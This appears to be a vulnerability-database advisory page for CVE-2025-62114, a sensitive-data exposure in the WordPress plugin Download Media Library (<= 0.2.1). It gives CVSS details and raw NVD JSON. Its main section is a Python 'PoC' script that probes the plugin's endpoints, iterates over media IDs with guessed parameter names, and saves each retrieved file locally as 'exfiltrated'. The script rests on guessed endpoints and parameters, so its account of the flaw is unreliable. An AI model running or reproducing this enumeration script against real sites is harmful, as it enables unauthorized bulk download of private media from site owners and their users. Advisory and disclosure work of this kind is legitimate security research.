Security Vulnerability Report
中文
CVE-2025-62114 CVSS 5.3 MEDIUM

CVE-2025-62114

Published: 2025-12-31 16:15:45
Last Modified: 2026-04-23 15:34:34
Source: [email protected]

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in marcelotorres Download Media Library download-media-library allows Retrieve Embedded Sensitive Data.This issue affects Download Media Library: from n/a through <= 0.2.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Download Media Library插件 <= 0.2.1(所有版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62114 PoC - WordPress Download Media Library Sensitive Information Exposure # Target: WordPress site with Download Media Library plugin <= 0.2.1 import requests import sys from urllib.parse import urljoin def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-62114 """ # Common WordPress media endpoint patterns endpoints = [ '/wp-content/plugins/download-media-library/', '/wp-content/plugins/download-media-library/download.php', '/wp-content/plugins/download-media-library/assets/download.php', ] vulnerable = False for endpoint in endpoints: test_url = urljoin(target_url, endpoint) try: response = requests.get(test_url, timeout=10, verify=False) # Check if endpoint exists and returns sensitive information if response.status_code == 200: if 'Content-Disposition' in response.headers or 'application' in response.headers.get('Content-Type', ''): print(f"[+] Potential vulnerable endpoint found: {test_url}") print(f"[+] Status: {response.status_code}") print(f"[+] Content-Type: {response.headers.get('Content-Type', 'N/A')}") vulnerable = True except requests.RequestException as e: print(f"[-] Error accessing {test_url}: {e}") return vulnerable def enumerate_media(target_url, media_id_range=(1, 100)): """ Enumerate and download media files using the vulnerable endpoint """ print("\n[*] Attempting to enumerate media files...") # Try common parameter names params_to_try = ['file', 'id', 'media_id', 'attachment_id', 'download'] for media_id in range(media_id_range[0], media_id_range[1]): for param in params_to_try: test_url = urljoin(target_url, '/wp-content/plugins/download-media-library/download.php') try: response = requests.get(test_url, params={param: media_id}, timeout=5, verify=False) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Found media file - ID: {media_id}, Size: {len(response.content)} bytes") # Save potentially sensitive content filename = f"media_{media_id}_exfiltrated.bin" with open(filename, 'wb') as f: f.write(response.content) print(f"[+] Saved to {filename}") except: pass if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-62114-poc.py <target_url>") print("Example: python cve-2025-62114-poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning target: {target}") print(f"[*] Testing for CVE-2025-62114\n") if check_vulnerability(target): print("\n[!] Target appears to be vulnerable to CVE-2025-62114") enumerate_media(target) else: print("\n[-] Target does not appear to be vulnerable or plugin not detected")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62114", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:44.713", "lastModified": "2026-04-23T15:34:34.077", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in marcelotorres Download Media Library download-media-library allows Retrieve Embedded Sensitive Data.This issue affects Download Media Library: from n/a through <= 0.2.1."}, {"lang": "es", "value": "Exposición de Información Sensible del Sistema a una Esfera de Control No Autorizada vulnerabilidad en Marcelo Torres Biblioteca de Descarga de Medios permite Recuperar Datos Sensibles Incrustados. Este problema afecta a Download Media Library : desde n/a hasta 0.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/download-media-library/vulnerability/wordpress-download-media-library-plugin-0-2-1-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.